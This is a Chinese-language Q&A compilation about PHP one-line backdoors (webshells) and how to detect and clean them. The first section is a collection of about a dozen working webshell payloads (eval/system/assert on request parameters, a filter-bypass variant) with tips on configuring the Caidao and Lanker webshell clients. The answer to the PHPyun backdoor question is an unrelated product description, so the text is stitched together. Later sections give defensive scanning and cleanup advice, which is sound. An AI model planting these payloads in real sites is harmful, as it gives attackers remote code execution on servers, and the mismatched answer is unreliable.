1. 一個有意思的 php 一句話後門,怎麼破
<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容錯代碼
<?php assert($_POST1);?>//使用Lanker一句話客戶端的專家模式執行相關的PHP語句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用這個後,使用菜刀一句話客戶端在
配置連接的時候在"配置"一欄輸入*/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//繞過<?限制的一句話
<script language="php">@eval_r($_POST[sb])</script>
2. PHPyun人才系統版權後門怎麼清除
設置刪除
PHP雲人才系統是一個採用PHP和MySQL資料庫構建的高效開源的人才與企業求職招、聘解決方案,在尊重版權的前提下能極大的滿足站長對於網站程序進行二次開發。PHP雲人才系統作為一款擁有自主知識產權的中文人才運營系統,力爭為給眾多的地方門戶、行業人才提供一個易用、功能強大的人才系統。
一、PHP雲人才系統產品配置需求:(1)、PHP5、Mysql5、Apache2/IIS6以上環境(2)、可以運行於Windows、Linux、Mac等多種平台(3)、瀏覽器前台需要用戶開啟Cookie功能(瀏覽需要IE6、火狐3.x以上)二、PHP雲人才系統產品特點:(1)、PHPOOP思想編寫方便維護和升級有很好的安全性(2)、採用PHP模板分離可以方便修改頁面和二次開發升級(3)、企業會員和個人會員分別使用獨立的管理的許可權模式不產生沖突方便管理。
PHP雲人才系統產品常見功能:(1)、個人會員擁有單賬戶多簡歷,快速根據不同企業投放不同簡歷(2)、個人會員可以通過創建標准簡歷和黏貼簡歷模式快速建立自己的簡歷信息(3)、個人會員可以通過搜索、收藏、投放等功能來管理個人求職情況(4)、個人會員可以通過申請、推薦模式找到精確的企業(5)、企業會員可以分為、普通會員、季度會員、年會員三類收費和管理(6)、企業會員可以發布不同簡歷和懸賞簡歷從而推薦到優先的位置(7)、企業會員可以通過申請廣告運營者可以從中獲得收入(8)、總後台可以通過審核、配置、預覽,查找配合網站運營操作獵頭服務(9)Yun(雲)人才系統的最大靚點是開啟了內容同步和交換功能,方便運營者資源的填充。
3. PHP的網站,怎麼掃描出潛藏的一句話木馬
查找那些高危函數就行了,比如eval
php後門木馬常用的函數大致上可分為四種類型:
1. 執行系統命令: system, passthru, shell_exec, exec, popen,
proc_open
2. 代碼執行與加密: eval, assert, call_user_func,base64_decode, gzinflate,
gzuncompress, gzdecode, str_rot13
3. 文件包含與生成: require, require_once, include, include_once,
file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
4. 怎樣檢測網站程序後門
放什麼地方都可以的,要知道在那裡,只有一行行代碼地看了,這是唯一辦法。
如果有,只能自己修改代碼。
如果你是老闆,花點錢叫另外一家公司幫你找吧,這些工作很不容易,不會比你寫容易多少,所以比較貴。
微軟的系統找漏洞也是這樣找的,只是他的模塊劃分得很好,他知道應該在那裡找。
5. PHP網站後門怎麼清除
一般都是網站程序存在漏洞或者伺服器存在漏洞而被攻擊了
網站掛馬是每個網站最頭痛的問題,解決辦法:1.在程序中很容易找到掛馬的代碼,直接刪除,或則將你沒有傳伺服器的源程序覆蓋一次但反反復復被掛就得深入解決掉此問題了。但這不是最好的解決辦法。最好的方法還是找專業做安全的來幫你解決掉
聽朋友說 SineSafe 不錯 你可以去看看。
清馬+修補漏洞=徹底解決
所謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感文件掃描,伺服器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然後登陸網站後台,通過資料庫 備份/恢復 或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過弱口令獲得伺服器或者網站FTP,然後直接對網站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒
清馬
1、找掛馬的標簽,比如有<script language="javascript" src="網馬地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=網馬地址></iframe>,或者是你用360或病殺毒軟體攔截了網馬網址。SQL資料庫被掛馬,一般是JS掛馬。
2、找到了惡意代碼後,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清,網頁清馬比較簡單,這里就不詳細講,現在著重講一下SQL資料庫清馬,用這一句語句「update 表名 set 欄位名=replace(欄位名,'aaa','')」, 解釋一下這一句子的意思:把欄位名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。
在你的網站程序或資料庫沒有備份情況下,可以實行以上兩步驟進行清馬,如果你的網站程序有備份的話,直接覆蓋原來的文件即可。
修補漏洞(修補網站漏洞也就是做一下網站安全。)
1、修改網站後台的用戶名和密碼及後台的默認路徑。
2、更改資料庫名,如果是ACCESS資料庫,那文件的擴展名最好不要用mdb,改成ASP的,文件名也可以多幾個特殊符號。
3、接著檢查一下網站有沒有注入漏洞或跨站漏洞,如果有的話就相當打上防注入或防跨站補丁。
4、檢查一下網站的上傳文件,常見了有欺騙上傳漏洞,就對相應的代碼進行過濾。
5、盡可能不要暴露網站的後台地址,以免被社會工程學猜解出管理用戶和密碼。
6、寫入一些防掛馬代碼,讓框架代碼等掛馬無效。
7、禁用FSO許可權也是一種比較絕的方法。
8、修改網站部分文件夾的讀寫許可權。
9、如果你是自己的伺服器,那就不僅要對你的網站程序做一下安全了,而且要對你的伺服器做一下安全也是很有必要了!